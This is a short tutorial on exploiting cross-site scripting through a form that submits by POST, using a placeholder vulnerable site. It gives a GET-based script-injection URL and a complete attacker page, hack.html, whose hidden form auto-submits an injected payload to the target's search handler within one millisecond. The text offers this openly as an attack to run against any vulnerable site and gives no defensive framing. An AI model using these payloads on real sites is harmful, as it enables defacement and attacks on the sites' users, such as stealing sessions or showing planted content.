XSS and post methods
When a webpage uses the GET method  to submit user inputs through a form, XSS is easily executed, by constructing a url for example like http://www.xssvulnsite.com/index.asp?q="><script>alert("XSS")</script>. But when a webpage uses the POST method it is not possible to craft such an url, using it as a link, because the page doesnt use the url to send the user inputs to the form. Although it is still possible to achieve XSS vulnerability exploitation.
So lets suppose one more time vulnerable site http://www.xssvulnsite.com/ using a form to search  or submit data. Very synoptic html code:
<html>
.
.
.
<body>
<form name="formX" method="post" action="/search.asp">
<input type="text" name="search_keyword" value="">
<input type="submit" value="submit">
</form>
.
.
</body>
</html>
To exploit XSS vulnerability we can use an indirect way. So another file will be written and then loaded to another page, lets say the file hack.html and the page http://www.redirectingpage.com/hack.html
What are its contents?
In the hack.html file the following code will be written
<html>.
.
<body>
<form method="post" action="http://www.xssvulnsite.com/search.asp" name="formX">
<input type="hidden" name="search_keyword" value='><img src="http://www.offensivephotos/offensivephoto.jpg">'>
</form>
<script type="text/javascript">
setTimeout(formX.submit(),1);
</script>
</body>
</html>
We can see that we are using the parameters of the original form to the form of the redirecting, a hidden form and in value a script, wanted to be executed, a photo, text, whatever we like to use in XSS hole.
Follows a script that when opens the middle page loads the XSSed vulnerable page after 1msec.